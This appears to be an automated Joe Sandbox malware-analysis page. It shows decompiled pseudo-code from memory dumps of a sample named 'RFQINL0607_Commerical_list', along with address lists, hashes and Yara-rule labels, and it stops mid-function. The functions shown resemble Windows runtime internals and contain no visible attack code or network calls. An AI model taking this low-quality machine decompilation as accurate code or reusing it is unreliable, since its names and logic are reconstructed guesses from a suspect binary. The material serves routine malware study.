                                                                                                                                                                                  0x3342320b
                                                                                                                                                                                  0x3342320e
                                                                                                                                                                                  0x3342320f
                                                                                                                                                                                  0x33423210
                                                                                                                                                                                  0x33423211
                                                                                                                                                                                  0x33423212
                                                                                                                                                                                  0x33423217
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342321d
                                                                                                                                                                                  0x3342321d
                                                                                                                                                                                  0x33423220
                                                                                                                                                                                  0x33423222
                                                                                                                                                                                  0x33423225
                                                                                                                                                                                  0x33423227
                                                                                                                                                                                  0x3342322a
                                                                                                                                                                                  0x33423231
                                                                                                                                                                                  0x33423238
                                                                                                                                                                                  0x33423238
                                                                                                                                                                                  0x3342323e
                                                                                                                                                                                  0x33423243
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33423245
                                                                                                                                                                                  0x33423245
                                                                                                                                                                                  0x33423247
                                                                                                                                                                                  0x3342324a
                                                                                                                                                                                  0x3342324d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342324d
                                                                                                                                                                                  0x33423243
                                                                                                                                                                                  0x33423217
                                                                                                                                                                                  0x334231ff
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                  • Instruction ID: 075fe231e5e94570a47028d26dd0f755f73bce9975ad7680b9a57d9ac4fb7d7b
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0519C71600606EFDB05CF54C580A46BBF9FF45348F19C4AAE808EF252E371E945CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3341A553 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                                  			E3341A553(intOrPtr* __ecx, char __edx, signed int _a4) {
				char _v12;
				char _v16;
				intOrPtr _v19;
				char _v20;
				intOrPtr _v23;
				void* _v32;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t41;
				void* _t42;
				char* _t54;
				signed int _t63;
				signed int _t71;
				void* _t72;
				signed int _t75;
				unsigned int _t76;
				char _t88;
				intOrPtr* _t101;
				signed int _t104;
				void* _t114;

				_t88 = __edx;
				_t1 =  &_a4;
				 *_t1 = _a4 & 0x00000001;
				_v12 = __edx;
				_t101 = __ecx;
				if( *_t1 == 0) {
					L33362330(__ecx + 0x40, __ecx + 0x40);
					_t88 = _v16;
				}
				_t36 = _t101 + 0x44;
				_t63 = 0;
				_t104 =  *_t36;
				if(( *(_t36 + 4) & 0x00000001) != 0) {
					if(_t104 == 0) {
						_t104 = 0;
					} else {
						_t104 = _t104 ^ _t36;
					}
				}
				_t71 =  *(_t36 + 4) & 1;
				if(_t104 == 0) {
					L18:
					if(_a4 == _t63) {
						E333624D0(_t101 + 0x40);
						_t88 = _v16;
					}
					_push(_t63);
					_push(_t63);
					_push(_t63);
					_push(_t88);
					_t72 = 8;
					E33415FED(_t72, _t101);
					goto L28;
				} else {
					_t41 = _t71;
					do {
						_t114 = _t88 - ( *(_t104 + 0xc) & 0xffff0000);
						if(_t114 < 0) {
							_t75 =  *_t104;
							goto L12;
						}
						if(_t114 <= 0) {
							break;
						}
						_t75 =  *(_t104 + 4);
						L12:
						if(_t41 == 0 || _t75 == 0) {
							_t104 = _t75;
						} else {
							_t104 = _t104 ^ _t75;
						}
					} while (_t104 != 0);
					_t42 = _t101 + 0x44;
					if(_t104 != 0) {
						_push(_t104);
						L33379B40(_t63, _t101, _t104, _t42);
						if(_a4 == _t63) {
							E333624D0(_t101 + 0x40);
						}
						_t76 =  *(_t104 + 0x10);
						_push( *((intOrPtr*)(_t101 + 4)));
						_push( *_t101);
						_t67 = 1 << (_t76 >> 0x00000002 & 0x0000003f);
						_push(0x8000);
						_t22 = _t67 - 1; // 0x0
						_v20 = ((_t76 >> 0x00000001 & 1) + (_t76 >> 0xc) << 0xc) - 1 + (1 << (_t76 >> 0x00000002 & 0x0000003f)) - (((_t76 >> 0x00000001 & 1) + (_t76 >> 0x0000000c) << 0x0000000c) - 0x00000001 + 1 & _t22);
						E33418845( &_v16,  &_v20);
						asm("lock xadd [eax], ecx");
						asm("lock xadd [eax], edx");
						E33419629(_t104,  *_t101,  *((intOrPtr*)(_t101 + 4)));
						_t106 = _v40;
						_t63 = _v40;
						if(L33363C40() == 0) {
							_t54 = 0x7ffe0388;
						} else {
							_t106 = _v23;
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
						}
						if( *_t54 != 0) {
							E3340DA30(_t63, _t101, _v19, _t106);
						}
						L28:
						return _t63;
					}
					goto L18;
				}
			}


























                                                                                                                                                                                  0x3341a553
                                                                                                                                                                                  0x3341a55e
                                                                                                                                                                                  0x3341a55e
                                                                                                                                                                                  0x3341a565
                                                                                                                                                                                  0x3341a569
                                                                                                                                                                                  0x3341a56b
                                                                                                                                                                                  0x3341a571
                                                                                                                                                                                  0x3341a576
                                                                                                                                                                                  0x3341a576
                                                                                                                                                                                  0x3341a57a
                                                                                                                                                                                  0x3341a57d
                                                                                                                                                                                  0x3341a583
                                                                                                                                                                                  0x3341a585
                                                                                                                                                                                  0x3341a589
                                                                                                                                                                                  0x3341a58f
                                                                                                                                                                                  0x3341a58b
                                                                                                                                                                                  0x3341a58b
                                                                                                                                                                                  0x3341a58b
                                                                                                                                                                                  0x3341a589
                                                                                                                                                                                  0x3341a595
                                                                                                                                                                                  0x3341a59a
                                                                                                                                                                                  0x3341a5cd
                                                                                                                                                                                  0x3341a5d0
                                                                                                                                                                                  0x3341a5d6
                                                                                                                                                                                  0x3341a5db
                                                                                                                                                                                  0x3341a5db
                                                                                                                                                                                  0x3341a5df
                                                                                                                                                                                  0x3341a5e0
                                                                                                                                                                                  0x3341a5e1
                                                                                                                                                                                  0x3341a5e2
                                                                                                                                                                                  0x3341a5e7
                                                                                                                                                                                  0x3341a5e8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a59c
                                                                                                                                                                                  0x3341a59c
                                                                                                                                                                                  0x3341a59e
                                                                                                                                                                                  0x3341a5a7
                                                                                                                                                                                  0x3341a5a9
                                                                                                                                                                                  0x3341a5b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a5b2
                                                                                                                                                                                  0x3341a5ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a5ad
                                                                                                                                                                                  0x3341a5b4
                                                                                                                                                                                  0x3341a5b6
                                                                                                                                                                                  0x3341a5c0
                                                                                                                                                                                  0x3341a5bc
                                                                                                                                                                                  0x3341a5bc
                                                                                                                                                                                  0x3341a5bc
                                                                                                                                                                                  0x3341a5c2
                                                                                                                                                                                  0x3341a5c6
                                                                                                                                                                                  0x3341a5cb
                                                                                                                                                                                  0x3341a5f2
                                                                                                                                                                                  0x3341a5f4
                                                                                                                                                                                  0x3341a5fc
                                                                                                                                                                                  0x3341a602
                                                                                                                                                                                  0x3341a602
                                                                                                                                                                                  0x3341a607
                                                                                                                                                                                  0x3341a60c
                                                                                                                                                                                  0x3341a613
                                                                                                                                                                                  0x3341a628
                                                                                                                                                                                  0x3341a62a
                                                                                                                                                                                  0x3341a634
                                                                                                                                                                                  0x3341a648
                                                                                                                                                                                  0x3341a64c
                                                                                                                                                                                  0x3341a65c
                                                                                                                                                                                  0x3341a66c
                                                                                                                                                                                  0x3341a677
                                                                                                                                                                                  0x3341a67c
                                                                                                                                                                                  0x3341a680
                                                                                                                                                                                  0x3341a689
                                                                                                                                                                                  0x3341a69f
                                                                                                                                                                                  0x3341a68b
                                                                                                                                                                                  0x3341a691
                                                                                                                                                                                  0x3341a698
                                                                                                                                                                                  0x3341a698
                                                                                                                                                                                  0x3341a6a7
                                                                                                                                                                                  0x3341a6b0
                                                                                                                                                                                  0x3341a6b0
                                                                                                                                                                                  0x3341a6b5
                                                                                                                                                                                  0x3341a6bd
                                                                                                                                                                                  0x3341a6bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341a5cb

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                                                                                                  • Instruction ID: 55100b6fd985e858ae1abffab857237dd5bc2e2741c578dfed9ea482810d71b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                                                                                                  • Instruction Fuzzy Hash: A941E771E18B159FD715CF24C880A5AB7A9FF84354F09852DE9528B748EB30ED28CBD8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33380118 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                                  			E33380118(void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				short _t46;
				short _t49;
				signed int _t58;
				signed short _t60;
				signed char _t64;
				intOrPtr* _t74;
				intOrPtr* _t76;
				signed short _t80;
				signed short* _t82;
				signed short _t83;
				signed short _t88;
				intOrPtr _t91;
				intOrPtr _t97;
				intOrPtr* _t99;
				short _t101;
				void* _t103;

				_t76 = __ecx;
				_push(0x2c);
				_push(0x3342c630);
				E333A7BE4(__ebx, __edi, __esi);
				_t99 = __edx;
				 *((intOrPtr*)(_t103 - 0x38)) = __edx;
				_t74 = __ecx;
				 *((intOrPtr*)(_t103 - 0x34)) = __ecx;
				if(E33380504(__ecx) == 0) {
					_t46 = 0xc000000d;
					L13:
					 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0x10));
					return _t46;
				}
				 *((intOrPtr*)(_t103 - 4)) = 0;
				if(E33380470(__edx, _t103 - 0x1c) != 0) {
					_t49 =  *((intOrPtr*)(_t103 - 0x1c));
					__eflags = _t49 - 0xc000;
					if(_t49 >= 0xc000) {
						_t49 = 0;
						 *((short*)(_t103 - 0x1c)) = 0;
						_t101 = 0xc000000d;
					} else {
						_t101 = 0;
					}
					 *((intOrPtr*)(_t103 - 0x20)) = _t101;
					_t80 =  *(_t103 + 8);
					__eflags = _t80;
					if(_t80 != 0) {
						 *_t80 = _t49;
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					E333624D0( *((intOrPtr*)(_t103 - 0x34)) + 8);
					_t46 = _t101;
					goto L13;
				}
				if( *_t99 == 0) {
					_t101 = 0xc0000033;
					L11:
					 *((intOrPtr*)(_t103 - 0x20)) = _t101;
					goto L12;
				}
				_t81 = _t74;
				_t101 = E3338035F(_t74, _t99, _t76, _t103 - 0x2c, _t103 - 0x24, _t103 - 0x30, _t103 - 0x28);
				 *((intOrPtr*)(_t103 - 0x20)) = _t101;
				if(_t101 < 0) {
					goto L12;
				}
				_t91 =  *((intOrPtr*)(_t103 - 0x28));
				if(_t91 != 0) {
					_t82 =  *(_t103 - 0x30);
					_t58 =  *_t82 & 0x0000ffff;
					__eflags = _t58 - 0xffff;
					if(_t58 == 0xffff) {
						_t82[1] = _t82[1] | 0x00000001;
					} else {
						_t60 = _t58 + 1;
						__eflags = _t60;
						 *_t82 = _t60;
					}
					_t83 =  *(_t103 + 8);
					__eflags = _t83;
					if(_t83 != 0) {
						 *_t83 =  *((intOrPtr*)(_t91 + 6));
					}
					_t101 = 0;
					goto L11;
				}
				_t114 =  *((intOrPtr*)(_t103 - 0x2c)) - _t91;
				if( *((intOrPtr*)(_t103 - 0x2c)) == _t91) {
					_t101 = 0xc000000d;
					goto L11;
				}
				_t101 = 0xc0000017;
				 *((intOrPtr*)(_t103 - 0x20)) = 0xc0000017;
				_t97 = E33380774(_t103 - 0x30, _t114, _t81);
				 *((intOrPtr*)(_t103 - 0x28)) = _t97;
				if(_t97 == 0) {
					goto L12;
				}
				_t18 = _t97 + 0xe; // 0xe
				E333988C0(_t18,  *((intOrPtr*)(_t103 - 0x38)),  *(_t103 - 0x24));
				_t64 =  *(_t103 - 0x24) >> 1;
				 *(_t97 + 0xc) = _t64;
				 *((short*)(_t97 + 0xe + (_t64 & 0x000000ff) * 2)) = 0;
				if(E333805C0(_t74, _t74, _t97) == 0) {
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
					_t101 =  *((intOrPtr*)(_t103 - 0x20));
					goto L12;
				}
				 *(_t97 + 6) = 0x0000c000 |  *(_t97 + 4);
				 *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x2c)))) = _t97;
				_t88 =  *(_t103 + 8);
				if(_t88 != 0) {
					 *_t88 =  *(_t97 + 6);
				}
				_t101 = 0;
				goto L11;
			}



















                                                                                                                                                                                  0x33380118
                                                                                                                                                                                  0x33380118
                                                                                                                                                                                  0x3338011a
                                                                                                                                                                                  0x3338011f
                                                                                                                                                                                  0x33380124
                                                                                                                                                                                  0x33380126
                                                                                                                                                                                  0x33380129
                                                                                                                                                                                  0x3338012b
                                                                                                                                                                                  0x33380135
                                                                                                                                                                                  0x333c0bce
                                                                                                                                                                                  0x33380222
                                                                                                                                                                                  0x33380225
                                                                                                                                                                                  0x33380231
                                                                                                                                                                                  0x33380231
                                                                                                                                                                                  0x3338013d
                                                                                                                                                                                  0x3338014c
                                                                                                                                                                                  0x3338025f
                                                                                                                                                                                  0x33380263
                                                                                                                                                                                  0x33380266
                                                                                                                                                                                  0x33380279
                                                                                                                                                                                  0x3338027b
                                                                                                                                                                                  0x3338027f
                                                                                                                                                                                  0x33380268
                                                                                                                                                                                  0x33380268
                                                                                                                                                                                  0x33380268
                                                                                                                                                                                  0x3338026a
                                                                                                                                                                                  0x3338026d
                                                                                                                                                                                  0x33380270
                                                                                                                                                                                  0x33380272
                                                                                                                                                                                  0x33380274
                                                                                                                                                                                  0x33380274
                                                                                                                                                                                  0x3338020d
                                                                                                                                                                                  0x3338020d
                                                                                                                                                                                  0x3338021b
                                                                                                                                                                                  0x33380220
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33380220
                                                                                                                                                                                  0x33380155
                                                                                                                                                                                  0x333c0bd8
                                                                                                                                                                                  0x3338020a
                                                                                                                                                                                  0x3338020a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338020a
                                                                                                                                                                                  0x3338016e
                                                                                                                                                                                  0x33380175
                                                                                                                                                                                  0x33380177
                                                                                                                                                                                  0x3338017c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33380182
                                                                                                                                                                                  0x33380187
                                                                                                                                                                                  0x33380234
                                                                                                                                                                                  0x33380237
                                                                                                                                                                                  0x3338023f
                                                                                                                                                                                  0x33380242
                                                                                                                                                                                  0x33380286
                                                                                                                                                                                  0x33380244
                                                                                                                                                                                  0x33380244
                                                                                                                                                                                  0x33380244
                                                                                                                                                                                  0x33380245
                                                                                                                                                                                  0x33380245
                                                                                                                                                                                  0x33380248
                                                                                                                                                                                  0x3338024b
                                                                                                                                                                                  0x3338024d
                                                                                                                                                                                  0x33380253
                                                                                                                                                                                  0x33380253
                                                                                                                                                                                  0x33380256
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33380256
                                                                                                                                                                                  0x3338018d
                                                                                                                                                                                  0x33380190
                                                                                                                                                                                  0x333c0bfb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c0bfb
                                                                                                                                                                                  0x33380196
                                                                                                                                                                                  0x3338019b
                                                                                                                                                                                  0x333801aa
                                                                                                                                                                                  0x333801ac
                                                                                                                                                                                  0x333801b1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333801b9
                                                                                                                                                                                  0x333801bd
                                                                                                                                                                                  0x333801c8
                                                                                                                                                                                  0x333801ca
                                                                                                                                                                                  0x333801d2
                                                                                                                                                                                  0x333801e2
                                                                                                                                                                                  0x333c0bee
                                                                                                                                                                                  0x333c0bf3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c0bf3
                                                                                                                                                                                  0x333801f1
                                                                                                                                                                                  0x333801f8
                                                                                                                                                                                  0x333801fa
                                                                                                                                                                                  0x333801ff
                                                                                                                                                                                  0x33380205
                                                                                                                                                                                  0x33380205
                                                                                                                                                                                  0x33380208
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b0c5eb5f3891aaacd6b1f83d1832713d0004fe23714a2d512979a57c357315ff
                                                                                                                                                                                  • Instruction ID: 1364ad160bfe92dceada81b89d66f0b57beaafceaf4c136529c441318a662c95
                                                                                                                                                                                  • Opcode Fuzzy Hash: b0c5eb5f3891aaacd6b1f83d1832713d0004fe23714a2d512979a57c357315ff
                                                                                                                                                                                  • Instruction Fuzzy Hash: F341B079D01318EBDB04CF98C880ADEB7B4BF48704F15C25AE815EB650D7798D49CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392670 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                  			E33392670(intOrPtr* __ecx, intOrPtr* __edx) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __ebx;
				signed int* _t57;
				signed int _t63;
				intOrPtr _t68;
				char* _t70;
				signed int _t80;
				signed int _t89;
				signed int _t91;
				intOrPtr* _t97;
				intOrPtr _t99;
				signed int _t100;
				signed int _t101;
				signed int _t105;
				void* _t107;
				intOrPtr* _t108;
				signed int _t113;

				_t97 = __ecx;
				_v16 = __edx;
				_v12 = __ecx;
				if( *__ecx != __edx) {
					asm("sbb eax, eax");
					_t105 = 0;
					_v8 = 0;
					_t80 = 0;
					_t4 = _t97 + 0x10; // -16
					_t57 = _t4;
					_v24 = _t57;
					while(1) {
						_t113 =  *_t57;
						_v20 = _t113;
						if((_t113 >> 0x00000010 & 0x00008000) != 0) {
							goto L8;
						}
						if(_t113 == 0) {
							L27:
							L2:
							return _t105;
						}
						asm("lock cmpxchg [edx], ecx");
						_t97 = _v12;
						if(_t113 == _t113) {
							L10:
							if(_t113 == 0xffffffff) {
								goto L27;
							}
							if(_t113 == 0) {
								L26:
								 *_v24 = _t113;
								goto L27;
							}
							_t63 =  *_t97 + 0x50;
							_v28 =  ~( *(_t97 + 0x18) & 0x0000ffff);
							_v8 = _t63;
							do {
								_t107 =  *_t63;
								_t99 =  *((intOrPtr*)(_t63 + 4));
								_v32 = _t99;
								asm("lock cmpxchg8b [esi]");
								_t63 = _v8;
							} while (_t107 != _t107 || _t99 != _v32);
							_t113 = _v20;
							_t100 =  *(_v12 + 0x18) & 0x0000ffff;
							_v8 = _t100;
							_t108 = _v16 + 0x50;
							do {
								_t68 =  *_t108;
								_t89 =  *(_t108 + 4);
								_v32 = _t68;
								_v28 = _t89;
								_t101 = _t89 + 1;
								if(_t100 == 0) {
									_t101 = _t89 - 1;
								}
								_v20 = _t101;
								asm("lock cmpxchg8b [edi]");
								_t91 = _t89;
								_t100 = _v8;
							} while (_t68 != _v32 || _t91 != _v28);
							_t84 = _v12;
							 *_v12 = _v16;
							_t105 = 1;
							if(L33363C40() == 0) {
								_t70 = 0x7ffe0380;
							} else {
								_t70 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							if( *_t70 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3340EEE7(_t84,  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0xc)) + 0xc)),  *((intOrPtr*)(_t84 + 4)), ( *( *[fs:0x18] + 0xfa8) & 0x000000ff) - 1);
							}
							goto L26;
						}
						L8:
						_t80 = _t80 + 1;
						if(_t80 <= _v8) {
							_t6 = _t97 + 0x10; // -16
							_t57 = _t6;
							continue;
						}
						_t113 = _t113 | 0xffffffff;
						_v20 = _t113;
						goto L10;
					}
				}
				_t105 = 1;
				goto L2;
			}


























                                                                                                                                                                                  0x3339267a
                                                                                                                                                                                  0x3339267d
                                                                                                                                                                                  0x33392680
                                                                                                                                                                                  0x33392685
                                                                                                                                                                                  0x333ca165
                                                                                                                                                                                  0x333ca16a
                                                                                                                                                                                  0x333ca16c
                                                                                                                                                                                  0x333ca16f
                                                                                                                                                                                  0x333ca171
                                                                                                                                                                                  0x333ca171
                                                                                                                                                                                  0x333ca175
                                                                                                                                                                                  0x333ca17d
                                                                                                                                                                                  0x333ca17d
                                                                                                                                                                                  0x333ca184
                                                                                                                                                                                  0x333ca18c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ca191
                                                                                                                                                                                  0x333ca2b1
                                                                                                                                                                                  0x3339268e
                                                                                                                                                                                  0x33392692
                                                                                                                                                                                  0x33392692
                                                                                                                                                                                  0x333ca1a4
                                                                                                                                                                                  0x333ca1a8
                                                                                                                                                                                  0x333ca1ad
                                                                                                                                                                                  0x333ca1bb
                                                                                                                                                                                  0x333ca1be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ca1c6
                                                                                                                                                                                  0x333ca2ac
                                                                                                                                                                                  0x333ca2af
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ca2af
                                                                                                                                                                                  0x333ca1d4
                                                                                                                                                                                  0x333ca1d7
                                                                                                                                                                                  0x333ca1da
                                                                                                                                                                                  0x333ca1dd
                                                                                                                                                                                  0x333ca1dd
                                                                                                                                                                                  0x333ca1df
                                                                                                                                                                                  0x333ca1e4
                                                                                                                                                                                  0x333ca1f1
                                                                                                                                                                                  0x333ca1fa
                                                                                                                                                                                  0x333ca1fa
                                                                                                                                                                                  0x333ca207
                                                                                                                                                                                  0x333ca20a
                                                                                                                                                                                  0x333ca214
                                                                                                                                                                                  0x333ca217
                                                                                                                                                                                  0x333ca219
                                                                                                                                                                                  0x333ca219
                                                                                                                                                                                  0x333ca21d
                                                                                                                                                                                  0x333ca220
                                                                                                                                                                                  0x333ca223
                                                                                                                                                                                  0x333ca229
                                                                                                                                                                                  0x333ca22c
                                                                                                                                                                                  0x333ca22e
                                                                                                                                                                                  0x333ca22e
                                                                                                                                                                                  0x333ca231
                                                                                                                                                                                  0x333ca23a
                                                                                                                                                                                  0x333ca23e
                                                                                                                                                                                  0x333ca240
                                                                                                                                                                                  0x333ca243
                                                                                                                                                                                  0x333ca24d
                                                                                                                                                                                  0x333ca253
                                                                                                                                                                                  0x333ca257
                                                                                                                                                                                  0x333ca25f
                                                                                                                                                                                  0x333ca271
                                                                                                                                                                                  0x333ca261
                                                                                                                                                                                  0x333ca26a
                                                                                                                                                                                  0x333ca26a
                                                                                                                                                                                  0x333ca279
                                                                                                                                                                                  0x333ca2a7
                                                                                                                                                                                  0x333ca2a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ca279
                                                                                                                                                                                  0x333ca1af
                                                                                                                                                                                  0x333ca1af
                                                                                                                                                                                  0x333ca1b3
                                                                                                                                                                                  0x333ca17a
                                                                                                                                                                                  0x333ca17a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ca17a
                                                                                                                                                                                  0x333ca1b5
                                                                                                                                                                                  0x333ca1b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ca1b8
                                                                                                                                                                                  0x333ca17d
                                                                                                                                                                                  0x3339268d
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                                                                                                                  • Instruction ID: 9a670192df14462ed57d97f15a45cca527862fc627695fba0bcf6d387fc96528
                                                                                                                                                                                  • Opcode Fuzzy Hash: 378b6ea2690461ba2e231297a609f0620a72d96a2581e8c9db1b1bf84233c730
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15514879E40669CFDB05CF98C880AAAF7B5FF84714F2881A9D855A7350D731AE81CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33356074 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                  			E33356074(signed int __ebx, void* __ecx, void* __edi, signed int __esi) {
				void* _t45;
				signed int _t46;
				intOrPtr _t49;
				signed int _t53;
				signed int _t55;
				void* _t57;
				signed int _t61;
				intOrPtr _t63;
				intOrPtr _t70;
				signed int _t74;
				intOrPtr* _t77;
				signed int _t80;
				unsigned int _t86;
				intOrPtr* _t87;
				void* _t89;
				signed int* _t90;
				void* _t91;
				void* _t92;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t94 = __esi;
				_t92 = __edi;
				_t74 = __ebx;
				if(( *(_t97 - 0x50) & 0x00000001) != 0) {
					_t45 = E3334BE18(_t97 - 0xd4);
					 *(_t97 - 0x50) =  *(_t97 - 0x50) & 0xfffffffe;
				}
				__eflags =  *((char*)(_t97 - 0xf6));
				if( *((char*)(_t97 - 0xf6)) != 0) {
					asm("lock dec dword [edi+0xf8]");
				}
				__eflags =  *((char*)(_t97 - 0xf7));
				if( *((char*)(_t97 - 0xf7)) == 0) {
					L8:
					__eflags =  *((char*)(_t97 - 0xf8));
					if(__eflags != 0) {
						_t79 = _t97 - 0xf0;
						_t45 = E3338C1D3(_t74, _t97 - 0xf0, _t92, _t94, __eflags);
						__eflags =  *((char*)(_t97 - 0xf9));
						if( *((char*)(_t97 - 0xf9)) != 0) {
							_t74 = 0;
							_t94 = _t92 + 0x2c;
							L33362330(_t45, _t94);
							__eflags =  *(_t92 + 0x10c) & 0x00000ffe;
							if(( *(_t92 + 0x10c) & 0x00000ffe) != 0) {
								_t49 =  *0x33446644; // 0x0
								_t53 = L33365D90(_t79,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49 + 0x000c0000 | 0x00000008, 0xc);
								 *(_t97 - 0x10c) = _t53;
								__eflags = _t53;
								if(_t53 == 0) {
									goto L11;
								} else {
									_push(2);
									_push(0);
									_push(0);
									_push(_t97 - 0x16c);
									_push(0xffffffff);
									_push(0xfffffffe);
									_push(0xffffffff);
									_t55 = E33392D70();
									__eflags = _t55;
									if(_t55 >= 0) {
										_t80 =  *(_t97 - 0x10c);
